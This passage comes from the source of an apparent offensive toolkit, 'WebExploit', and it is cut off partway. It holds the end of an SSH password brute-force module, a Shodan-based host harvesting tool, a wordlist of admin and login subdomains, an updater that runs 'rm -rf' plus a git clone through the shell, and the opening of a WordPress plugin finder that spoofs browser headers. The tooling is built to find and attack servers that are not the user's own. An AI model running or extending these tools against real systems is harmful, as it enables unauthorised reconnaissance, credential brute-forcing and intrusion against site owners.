Passowrd: {bold} \'{red}{password}{nbold}{white}\' {bold}{red} Not SUCESSFULL ! {nbold}{yellow} Because: {bold}{ssh_error}') 213 | continue 214 | 215 | 216 | 217 | 218 | 219 | -------------------------------------------------------------------------------- /cores/sse.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | 'pip install google-search' 26 | try: 27 | import time as t 28 | from colorama import Fore as f 29 | import sys, os 30 | from random import choice 31 | import shodan 32 | except: 33 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !") 34 | t.sleep(1) 35 | sys.exit() 36 | 37 | black = "\033[0;30m" 38 | red = "\033[0;31m" 39 | green = "\033[0;32m" 40 | brown = "\033[0;33m" 41 | blue = "\033[0;34m" 42 | purple = "\033[0;35m" 43 | cyan = "\033[0;36m" 44 | l_gray = "\033[0;37m" 45 | dark_gray = "\033[1;30m" 46 | l_red = "\033[1;31m" 47 | l_green = "\033[1;32m" 48 | yellow = "\033[1;33m" 49 | l_blue = "\033[1;34m" 50 | l_purple = "\033[1;35m" 51 | l_cyan = "\033[1;36m" 52 | l_white = "\033[1;37m" 53 | faint = "\033[2m" 54 | italic = "\033[3m" 55 | underline = "\033[4m" 56 | blink = "\033[5m" 57 | nefative = "\033[7m" 58 | cross = "\033[9m" 59 | ended = "\033[0m" 60 | bold = "\033[1m" 61 | nbold = "\033[0m" 62 | white = f.WHITE 63 | 64 | bnr = [''' 65 | ██████ ██████ ▓█████ 66 | ▒██ ▒ ▒██ ▒ ▓█ ▀ 67 | ░ ▓██▄ ░ ▓██▄ ▒███ 68 | ▒ ██▒ ▒ ██▒ ▒▓█ ▄ 69 | ▒██████▒▒ ▒██████▒▒ ░▒████ 70 | ▒ ▒▓▒ ▒ ░ ▒ ▒▓▒ ▒ ░ ░░ ▒░ 71 | ░ ░▒ ░ ░ ░▒ ░ ░ ░ 72 | ░ ░ ░ ░ ░ ░ ░ 73 | ░ ░ ░ ''', ''' 74 | ░▒█▀▀▀█░░░▒█▀▀▀█░░░▒█▀▀▀ 75 | ░░▀▀▀▄▄░░░░▀▀▀▄▄░░░▒█▀▀▀ 76 | ░▒█▄▄▄█░░░▒█▄▄▄█░░░▒█▄▄▄ '''] 77 | 78 | def r_bnr(bnr): 79 | return choice(bnr) 80 | 81 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 82 | t.sleep(2) 83 | print(f' {italic}From{ended} : ', end='') 84 | #create flush text [simple] 85 | print(f'{red}{bold}', end='', flush=True) 86 | print(f'{bold}W', end='', flush=True) 87 | t.sleep(0.5) 88 | print('e', end='', flush=True) 89 | t.sleep(0.7) 90 | print('b', end='', flush=True) 91 | t.sleep(0.4) 92 | print('E', end='', flush=True) 93 | t.sleep(0.1) 94 | print('x', end='', flush=True) 95 | t.sleep(0.2) 96 | print('p', end='', flush=True) 97 | t.sleep(0.3) 98 | print('l', end='', flush=True) 99 | t.sleep(0.4) 100 | print('o', end='', flush=True) 101 | t.sleep(0.5) 102 | print('i', end='', flush=True) 103 | t.sleep(1.5) 104 | print(f't{ended}', flush=True) 105 | nbold = "\033[0m" # tahe koskholi ! 106 | t.sleep(1) 107 | print(f'{white}{nbold}') 108 | 109 | print (f'\n {bold}{f.GREEN}[{f.WHITE}SSE{f.GREEN}]{f.WHITE}{f.RED} S.S.E{f.WHITE}{bold} S{nbold}odan {bold}S{nbold}earch {bold}E{nbold}ngine T00L !\n\n\n') 110 | t.sleep(3) 111 | 112 | save_question = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}SAVER{nbold}{f.WHITE} Save You\'r Logs To a .txt File? {bold}\'LOG_FILE\'{nbold} [ex: Y/y | N/n]:#{f.GREEN}{bold} ').lower() 113 | 114 | log = ('') 115 | data = ('') 116 | 117 | def saver(data): 118 | file = open((log) + ".txt", "a") 119 | file.write(data) 120 | file.close() 121 | 122 | if save_question.startswith("y"): 123 | log = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}SAVER{nbold}{f.WHITE} Give The Log\'s File Name ! {bold}\'LOG_FILE_NAME\'{nbold} [ex: MyLogs]:#{f.GREEN}{bold} ') 124 | #log = (log + '.txt') 125 | #print(pt) 126 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}Log\'s File Name{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{log}{nbold}') 127 | 128 | else: 129 | print (f'\n {f.YELLOW}{bold}WARNING{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}SAVER{nbold}{f.GREEN}{bold} SAVING \'SKIPPED\'{f.WHITE} ') 130 | 131 | t.sleep(2) 132 | print(f'{nbold}') 133 | while True: 134 | try: 135 | api_key = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}SAVER{nbold}{f.WHITE} GIVE ME A {bold}\'SHODAN_API_KEY\'{nbold} [ex: J2IdjIAjdiWiJVn...]:#{f.GREEN}{bold} ') #.rstrip("\n") 136 | if api_key: 137 | break 138 | else: 139 | continue 140 | 141 | except KeyboardInterrupt: 142 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 143 | t.sleep(2) 144 | sys.exit(0) 145 | 146 | 147 | t.sleep(3) 148 | print(f'{nbold}') 149 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}API KEY{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{api_key}{nbold}\n') 150 | t.sleep(0.5) 151 | api = shodan.Shodan(api_key) 152 | limit_num = 888 153 | count_num = 1 154 | 155 | try: 156 | 157 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}VERIFY [Shodan.io] API KEY{nbold}{f.WHITE}]{f.WHITE}{bold} CHECKING . . .{nbold}\n') 158 | api.search("WebExploit") 159 | t.sleep(1) 160 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}API KEY \'Authentication\' {nbold}{f.WHITE}] >>> {f.GREEN}{bold} SUCCESS . . .{nbold}\n') 161 | 162 | searcher = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}SAVER{nbold}{f.WHITE} Enter You\'r {bold}\'KEYWORD[s]\'{nbold} [ex: port:80 http.title:"HACKED"]:#{f.GREEN}{bold} ') 163 | 164 | count_num = count_num + 1 165 | 166 | for result in api.search_cursor(searcher): 167 | ip = (result["ip_str"]) 168 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}IP{nbold}{f.WHITE} >>> {bold}{green}{bold}{ip}{nbold}\n') 169 | t.sleep(0.1) 170 | port = (result["port"]) 171 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}PORT{nbold}{f.WHITE} >>> {bold}{green}{bold}{port}{nbold}\n') 172 | t.sleep(0.1) 173 | org = (result["org"]) 174 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ORGANIZATION{nbold}{f.WHITE} >>> {bold}{green}{bold}{org}{nbold}\n') 175 | t.sleep(0.1) 176 | loc = (result["location"]) 177 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}LOCATION{nbold}{f.WHITE} >>> {bold}{green}{bold}{loc}{nbold}\n') 178 | t.sleep(0.1) 179 | tra = (result["transport"]) 180 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}LAYER{nbold}{f.WHITE} >>> {bold}{green}{bold}{tra}{nbold}\n') 181 | t.sleep(0.1) 182 | dom = (result["domains"]) 183 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}DOMAIN\'S{nbold}{f.WHITE} >>> {bold}{green}{bold}{dom}{nbold}\n') 184 | t.sleep(0.1) 185 | hosts = (result["hostnames"]) 186 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}HOST-NAME\'S{nbold}{f.WHITE} >>> {bold}{green}{bold}{hosts}{nbold}\n') 187 | t.sleep(0.1) 188 | d = (result["data"]) 189 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}INFORMATION-SERVICE{nbold}{f.WHITE} >>> {bold}{green}{bold}{d}{nbold}\n') 190 | t.sleep(0.5) 191 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}SEARCH QUERY{nbold}{f.WHITE} >>> {bold}{green}{bold}{(str(count_num))}{nbold}\n') 192 | t.sleep(0.5) 193 | data = ("\t\n\nIP: " + str(result["ip_str"]) + ("\nPORT: " + str(result["port"])) + ("\nORGANIZATION: " + str(result["org"])) + ("\nLOCATION: " + str(result["location"])) + ("\nLAYER: " + str(result["transport"])) + ("\nDOMAINS: " + str(result["domains"])) + ("\nHOSTNAMES: " + str(result["hostnames"])) + ("\nDATA\n" + result["data"])) 194 | 195 | saver(data) 196 | 197 | t.sleep(0.3) 198 | count_num += 1 199 | if count_num >= limit_num: 200 | #os.system(f('mv {log} {pt}')) 201 | exit() 202 | except KeyboardInterrupt: 203 | 204 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 205 | t.sleep(2) 206 | sys.exit(0) 207 | 208 | except shodan.APIError as shodan_key_error: 209 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}S.S.E/{bold} !!! \'ERROR\' !!!{nbold}{f.WHITE}] >>> {f.GREEN}{bold} {shodan_key_error} {nbold}\n') 210 | print(f'\n\n {nbold}{f.WHITE}{f.RED}{bold}EXITTING . . .') 211 | t.sleep(3) 212 | sys.exit(0) 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | -------------------------------------------------------------------------------- /cores/subdomains.txt: -------------------------------------------------------------------------------- 1 | admin 2 | login 3 | log-in 4 | logini 5 | login1 6 | admin1 7 | administer 8 | administrator 9 | administratoraccounts 10 | account 11 | access 12 | adminlogin 13 | cp 14 | cpanel 15 | admin2 16 | ad3 17 | add 18 | administratoraccount 19 | admin 20 | log 21 | control 22 | control-admin 23 | control-panel 24 | paneladmin 25 | user 26 | users 27 | username 28 | tt 29 | ladmin 30 | loginadmin 31 | loginuser 32 | usr 33 | main 34 | administrators 35 | xadmin 36 | 1 37 | m 38 | cg 39 | cntrl 40 | ctrl 41 | accounts 42 | adminlogin 43 | userlogin 44 | ac 45 | acc 46 | pnl 47 | a 48 | acceptatie 49 | access 50 | accounting 51 | accounts 52 | ad 53 | adm 54 | admin 55 | administrator 56 | ads 57 | adserver 58 | affiliate 59 | affiliates 60 | agenda 61 | alpha 62 | alumni 63 | analytics 64 | ann 65 | api 66 | area 67 | apollo 68 | app 69 | apps 70 | ar 71 | archive 72 | art 73 | assets 74 | atlas 75 | auth 76 | auto 77 | autoconfig 78 | autodiscover 79 | av 80 | ayuda 81 | b 82 | b2b 83 | backup 84 | backups 85 | banner 86 | barracuda 87 | bb 88 | bbs 89 | beta 90 | biblioteca 91 | billing 92 | blackboard 93 | blog 94 | blogs 95 | board 96 | book 97 | booking 98 | bookings 99 | broadcast-ip 100 | bsd 101 | bt 102 | bug 103 | bugs 104 | business 105 | c 106 | ca 107 | cache 108 | cacti 109 | cal 110 | calendar 111 | cam 112 | careers 113 | cart 114 | cas 115 | catalog 116 | catalogo 117 | catalogue 118 | cc 119 | cctv 120 | cdn 121 | cdn1 122 | cdn2 123 | chat 124 | chimera 125 | chronos 126 | ci 127 | cisco 128 | citrix 129 | classroom 130 | client 131 | clientes 132 | clients 133 | cloud 134 | cloudflare-resolve-to 135 | club 136 | cms 137 | cn 138 | co 139 | community 140 | conference 141 | config 142 | connect 143 | contact 144 | contacts 145 | content 146 | control 147 | controller 148 | controlp 149 | controlpanel 150 | corp 151 | corporate 152 | correo 153 | correoweb 154 | cp 155 | cpanel 156 | crm 157 | cs 158 | css 159 | customers 160 | cvs 161 | d 162 | da 163 | loads 164 | data 165 | down 166 | download 167 | downloads 168 | downlod 169 | lod 170 | loading 171 | load 172 | database 173 | db 174 | db1 175 | db2 176 | dbadmin 177 | dbs 178 | dc 179 | de 180 | default 181 | demo 182 | demo2 183 | demon 184 | demostration 185 | descargas 186 | design 187 | desktop 188 | dev 189 | dev01 190 | dev1 191 | dev2 192 | devel 193 | developers 194 | development 195 | dialin 196 | diana 197 | direct 198 | directory 199 | dl 200 | dmz 201 | dns 202 | dns1 203 | dns2 204 | dns3 205 | dns4 206 | doc 207 | docs 208 | domain 209 | domain-controller 210 | domainadmin 211 | domaincontrol 212 | domaincontroller 213 | domaincontrolpanel 214 | domainmanagement 215 | domains 216 | drupal 217 | e 218 | eaccess 219 | echo 220 | ecommerce 221 | edu 222 | ektron 223 | elearning 224 | en 225 | eng 226 | enterpriseenrollment 227 | enterpriseregistration 228 | erp 229 | es 230 | event 231 | events 232 | ex 233 | example 234 | examples 235 | exchange 236 | external 237 | extranet 238 | f 239 | facebook 240 | faq 241 | fax 242 | fb 243 | feedback 244 | feeds 245 | file 246 | files 247 | fileserver 248 | finance 249 | firewall 250 | folders 251 | forms 252 | foro 253 | foros 254 | forum 255 | forums 256 | foto 257 | fr 258 | free 259 | freebsd 260 | fs 261 | ftp 262 | ftp1 263 | ftp2 264 | ftpadmin 265 | ftpd 266 | fw 267 | g 268 | galeria 269 | gallery 270 | game 271 | games 272 | gate 273 | gateway 274 | gilford 275 | gis 276 | git 277 | gmail 278 | go 279 | google 280 | groups 281 | groupwise 282 | gu 283 | guest 284 | guia 285 | guide 286 | gw 287 | health 288 | help 289 | helpdesk 290 | hera 291 | heracles 292 | hercules 293 | hermes 294 | home 295 | homer 296 | host 297 | host2 298 | hosting 299 | hotspot 300 | hr 301 | hypernova 302 | i 303 | id 304 | idp 305 | im 306 | image 307 | images 308 | images1 309 | images2 310 | images3 311 | images4 312 | images5 313 | images6 314 | images7 315 | images8 316 | imail 317 | imap 318 | imap3 319 | imap3d 320 | imapd 321 | imaps 322 | img 323 | img1 324 | img2 325 | img3 326 | imgs 327 | imogen 328 | in 329 | incoming 330 | info 331 | inmuebles 332 | internal 333 | interno 334 | intra 335 | intranet 336 | io 337 | ip 338 | ip6 339 | ipfixe 340 | iphone 341 | ipmi 342 | ipsec 343 | ipv4 344 | ipv6 345 | irc 346 | ircd 347 | is 348 | isa 349 | it 350 | j 351 | ja 352 | jabber 353 | jboss 354 | jboss2 355 | jira 356 | job 357 | jobs 358 | jp 359 | js 360 | jupiter 361 | k 362 | kb 363 | kerberos 364 | l 365 | la 366 | lab 367 | laboratories 368 | laboratorio 369 | laboratory 370 | labs 371 | ldap 372 | legacy 373 | lib 374 | library 375 | link 376 | links 377 | linux 378 | lisa 379 | list 380 | lists 381 | live 382 | lms 383 | local 384 | localhost 385 | log 386 | loghost 387 | login 388 | logon 389 | logs 390 | london 391 | loopback 392 | love 393 | lp 394 | lync 395 | lyncdiscover 396 | m 397 | m1 398 | m2 399 | magento 400 | mail 401 | mail01 402 | mail1 403 | mail2 404 | mail3 405 | mail4 406 | mail5 407 | mailadmin 408 | mailbackup 409 | mailbox 410 | mailer 411 | mailgate 412 | mailhost 413 | mailing 414 | mailman 415 | mailserver 416 | main 417 | manage 418 | manager 419 | mantis 420 | map 421 | maps 422 | market 423 | marketing 424 | mars 425 | master 426 | math 427 | mb 428 | mc 429 | mx1 430 | mx2 431 | mx3 432 | mx4 433 | mx5 434 | mx6 435 | mx7 436 | mx8 437 | mx9 438 | mx10 439 | mdm 440 | media 441 | meet 442 | member 443 | members 444 | mercury 445 | meta 446 | meta01 447 | meta02 448 | meta03 449 | meta1 450 | meta2 451 | meta3 452 | miembros 453 | mijn 454 | minerva 455 | mirror 456 | ml 457 | mm 458 | mob 459 | mobil 460 | mobile 461 | monitor 462 | monitoring 463 | moodle 464 | movil 465 | mrtg 466 | ms 467 | msoid 468 | mssql 469 | munin 470 | music 471 | mx 472 | mx-a 473 | mx-b 474 | mx0 475 | mx01 476 | mx02 477 | mx03 478 | mx1 479 | mx2 480 | mx3 481 | my 482 | mysql 483 | mysql2 484 | n 485 | nagios 486 | nas 487 | nat 488 | nelson 489 | neon 490 | net 491 | netmail 492 | netscaler 493 | network 494 | network-ip 495 | networks 496 | new 497 | newmail 498 | news 499 | newsgroups 500 | newsite 501 | newsletter 502 | nl 503 | noc 504 | novell 505 | ns 506 | ns0 507 | ns01 508 | ns02 509 | ns03 510 | ns1 511 | ns10 512 | ns11 513 | ns12 514 | ns2 515 | ns3 516 | ns4 517 | ns5 518 | ns6 519 | ns7 520 | ns8 521 | nt 522 | ntp 523 | ntp1 524 | o 525 | oa 526 | office 527 | office2 528 | old 529 | oldmail 530 | oldsite 531 | oldwww 532 | on 533 | online 534 | op 535 | openbsd 536 | operation 537 | operations 538 | ops 539 | ora 540 | oracle 541 | origin 542 | orion 543 | os 544 | osx 545 | ou 546 | outgoing 547 | outlook 548 | owa 549 | ox 550 | p 551 | painel 552 | panel 553 | partner 554 | partners 555 | pay 556 | payment 557 | payments 558 | pbx 559 | pcanywhere 560 | pda 561 | pegasus 562 | pendrell 563 | personal 564 | pgsql 565 | phoenix 566 | photo 567 | photos 568 | php 569 | phpmyadmin 570 | pm 571 | pma 572 | poczta 573 | pop 574 | pop3 575 | portal 576 | portfolio 577 | post 578 | postgres 579 | postgresql 580 | postman 581 | postmaster 582 | pp 583 | ppp 584 | pr 585 | pre-prod 586 | pre-production 587 | preprod 588 | press 589 | preview 590 | private 591 | pro 592 | prod 593 | priv8 594 | production 595 | project 596 | projects 597 | promo 598 | proxy 599 | prueba 600 | pruebas 601 | pt 602 | pub 603 | public 604 | q 605 | qa 606 | r 607 | ra 608 | radio 609 | radius 610 | ras 611 | rdp 612 | redirect 613 | redmine 614 | register 615 | relay 616 | remote 617 | remote2 618 | repo 619 | report 620 | reports 621 | repos 622 | research 623 | resources 624 | restricted 625 | reviews 626 | robinhood 627 | root 628 | router 629 | rss 630 | rt 631 | rtmp 632 | ru 633 | s 634 | s1 635 | s2 636 | s3 637 | s4 638 | sa 639 | sales 640 | sample 641 | samples 642 | sandbox 643 | sc 644 | search 645 | secure 646 | security 647 | seo 648 | server 649 | server1 650 | server2 651 | service 652 | services 653 | sftp 654 | share 655 | sharepoint 656 | shell 657 | shop 658 | shopping 659 | signup 660 | sip 661 | site 662 | siteadmin 663 | sitebuilder 664 | sites 665 | skype 666 | sms 667 | smtp 668 | smtp1 669 | smtp2 670 | smtp3 671 | snmp 672 | social 673 | software 674 | solaris 675 | soporte 676 | sp 677 | spam 678 | speedtest 679 | sport 680 | sports 681 | sql 682 | sqlserver 683 | squirrel 684 | squirrelmail 685 | ssh 686 | ssl 687 | sslvpn 688 | sso 689 | st 690 | staff 691 | stage 692 | staging 693 | start 694 | stat 695 | static 696 | static1 697 | static2 698 | stats 699 | status 700 | storage 701 | store 702 | stream 703 | streaming 704 | student 705 | sun 706 | support 707 | survey 708 | sv 709 | svn 710 | t 711 | team 712 | tech 713 | telewerk 714 | telework 715 | temp 716 | test 717 | test1 718 | test2 719 | test3 720 | testing 721 | testsite 722 | testweb 723 | tfs 724 | tftp 725 | thumbs 726 | ticket 727 | tickets 728 | time 729 | tools 730 | trac 731 | track 732 | tracker 733 | tracking 734 | train 735 | training 736 | travel 737 | ts 738 | tunnel 739 | tutorials 740 | tv 741 | tw 742 | u 743 | uat 744 | uk 745 | unix 746 | up 747 | update 748 | upload 749 | uploads 750 | us 751 | user 752 | users 753 | v 754 | v2 755 | vb 756 | vc 757 | ventas 758 | video 759 | videos 760 | vip 761 | virtual 762 | vista 763 | vle 764 | vm 765 | vms 766 | vmware 767 | vnc 768 | vod 769 | voip 770 | vpn 771 | vpn1 772 | vpn2 773 | vpn3 774 | vps 775 | vps1 776 | vps2 777 | w 778 | w3 779 | wap 780 | wc 781 | web 782 | web0 783 | web01 784 | web02 785 | web03 786 | web1 787 | web2 788 | web3 789 | web4 790 | web5 791 | webadmin 792 | webcam 793 | webconf 794 | webct 795 | webdb 796 | webdisk 797 | weblog 798 | webmail 799 | webmail2 800 | webmaster 801 | webmin 802 | webservices 803 | webstats 804 | webstore 805 | whm 806 | wifi 807 | wiki 808 | win 809 | win32 810 | windows 811 | wordpress 812 | work 813 | wp 814 | ws 815 | wsus 816 | ww 817 | ww0 818 | ww01 819 | ww02 820 | ww03 821 | ww1 822 | ww2 823 | ww3 824 | www 825 | www-test 826 | www0 827 | www01 828 | www02 829 | www03 830 | webexploit 831 | www1 832 | www2 833 | www3 834 | www4 835 | www5 836 | www6 837 | www7 838 | wwwm 839 | wwwold 840 | wwww 841 | x 842 | xml 843 | zabbix 844 | zeus 845 | zimbra 846 | -------------------------------------------------------------------------------- /cores/updater.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from requests import get 3 | from subprocess import Popen 4 | 5 | def run(): 6 | 7 | ver:str=open('VERSION', 'r').read().split()[0] 8 | 9 | githubVerionController:str=get('https://raw.githubusercontent.com/C4ssif3r/WebExploit/main/VERSION').text.split()[0] 10 | 11 | if ver != githubVerionController: 12 | updateQuestion:str=input (f'update available !\n web explloit new verion: {githubVerionController}\nare you want to update ? [y/n] ').lower() 13 | if updateQuestion=='y': 14 | Popen('cd .. && rm -rf WebExploit && git clone --depth=1 https://github.com/C4ssif3r/WebExploit', shell=True) 15 | print ('[WebExploit] UPDATED , PLZ CLOSE TERMINAL AND USE AGAIN =)') 16 | else: print ("[WebExploit] UPDATE SKIPPED .") 17 | else: 18 | print ("[WebExploit] YOU ARE USING LASTED VERSION") 19 | return 20 | 21 | 22 | -------------------------------------------------------------------------------- /cores/wpf.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | try: 26 | import time as t 27 | from colorama import Fore as f 28 | import sys, os 29 | import requests as r 30 | from random import choice 31 | from fake_headers import Headers 32 | except: 33 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !") 34 | t.sleep(1) 35 | sys.exit() 36 | 37 | black = "\033[0;30m" 38 | red = "\033[0;31m" 39 | green = "\033[0;32m" 40 | brown = "\033[0;33m" 41 | blue = "\033[0;34m" 42 | purple = "\033[0;35m" 43 | cyan = "\033[0;36m" 44 | l_gray = "\033[0;37m" 45 | dark_gray = "\033[1;30m" 46 | l_red = "\033[1;31m" 47 | l_green = "\033[1;32m" 48 | yellow = "\033[1;33m" 49 | l_blue = "\033[1;34m" 50 | l_purple = "\033[1;35m" 51 | l_cyan = "\033[1;36m" 52 | l_white = "\033[1;37m" 53 | faint = "\033[2m" 54 | italic = "\033[3m" 55 | underline = "\033[4m" 56 | blink = "\033[5m" 57 | nefative = "\033[7m" 58 | cross = "\033[9m" 59 | ended = "\033[0m" 60 | bold = "\033[1m" 61 | nbold = "\033[0m" 62 | white = f.WHITE 63 | 64 | bnr = [''' 65 | ░█░░▒█░░▒█▀▄░░▒█▀ 66 | ░▀▄▀▄▀▒░░█▀▒▒░░█▀ ''', ''' 67 | █ █░ ██▓███ █████ 68 | ▓█░ █ ░█░ ▓██░ ██ ▓██ 69 | ▒█░ █ ░█ ▓██░ ██▓▒ ▒████ 70 | ░█░ █ ░█ ▒██▄█▓▒ ▒ ░▓█▒ 71 | ░░██▒██▓ ▒██▒ ░ ░ ▒░▒█░ 72 | ░ ▓░▒ ▒ ▒▓▒░ ░ ░ ░ ▒ ░ 73 | ▒ ░ ░ ░▒ ░ ░ ░ 74 | ░ ░ ░░ ░ ░ 75 | ░ ░ '''] 76 | 77 | def r_bnr(bnr): 78 | return choice(bnr) 79 | 80 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 81 | t.sleep(2) 82 | print(f' {italic}From{ended} : ', end='') 83 | #create flush text [simple] 84 | print(f'{red}{bold}', end='', flush=True) 85 | print(f'{bold}W', end='', flush=True) 86 | t.sleep(0.5) 87 | print('e', end='', flush=True) 88 | t.sleep(0.7) 89 | print('b', end='', flush=True) 90 | t.sleep(0.4) 91 | print('E', end='', flush=True) 92 | t.sleep(0.1) 93 | print('x', end='', flush=True) 94 | t.sleep(0.2) 95 | print('p', end='', flush=True) 96 | t.sleep(0.3) 97 | print('l', end='', flush=True) 98 | t.sleep(0.4) 99 | print('o', end='', flush=True) 100 | t.sleep(0.5) 101 | print('i', end='', flush=True) 102 | t.sleep(1.5) 103 | print(f't{ended}', flush=True) 104 | nbold = "\033[0m" # tahe koskholi ! 105 | t.sleep(1) 106 | print(f'{white}{nbold}') 107 | 108 | print (f'\n {bold}{f.GREEN}[{f.WHITE}WPF{f.GREEN}]{f.WHITE}{f.RED} W.P.F{f.WHITE}{bold} W{nbold}ordpress {bold}P{nbold}lugin {bold}F{nbold}inder T00L !\n\n\n') 109 | t.sleep(3) 110 | 111 | 112 | while True: 113 | try: 114 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}W.P.F/{bold}WP-URL{nbold}{f.WHITE} enter \'WordPress-{bold}URL{nbold}\' [ex: wordpress.com]:#{f.GREEN}{bold} ') 115 | print(f'{nbold}') 116 | 117 | if url: 118 | if 'http' in url or 'https' in url: 119 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.CYAN}Skipper{f.WHITE}] SKIPPING ADD {bold}{f.GREEN} HTTP://{nbold} to [{green}{bold}{url}{nbold}]\n') 120 | t.sleep(2) 121 | break 122 | if 'http' not in url or 'https' not in url: 123 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.CYAN}Adder{white}] AUTOMATICALLY ADDING {bold}{f.GREEN} HTTP://{nbold} to [{green}{bold}{url}{nbold}]\n') 124 | url = (f'http://{url}') 125 | t.sleep(2) 126 | break 127 | else: 128 | continue 129 | except KeyboardInterrupt: 130 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 131 | t.sleep(2) 132 | # break 133 | sys.exit(0) 134 | 135 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}WPF/{bold}URL{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{url}{nbold}\n') 136 | t.sleep(2) 137 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.GREEN}CHECK-URL{white}] {nbold}{f.CYAN} FOR VERIFY SITE IS \'{bold}WORDPRESS{nbold}\'] . . .{nbold} \n') 138 | t.sleep(2) 139 | if url[-1:] == '/': 140 | pass 141 | else: 142 | url = (f'{url}/') 143 | 144 | try: 145 | headers1 = Headers( 146 | browser="firefox", 147 | os="lin", 148 | headers=True).generate() 149 | checker = 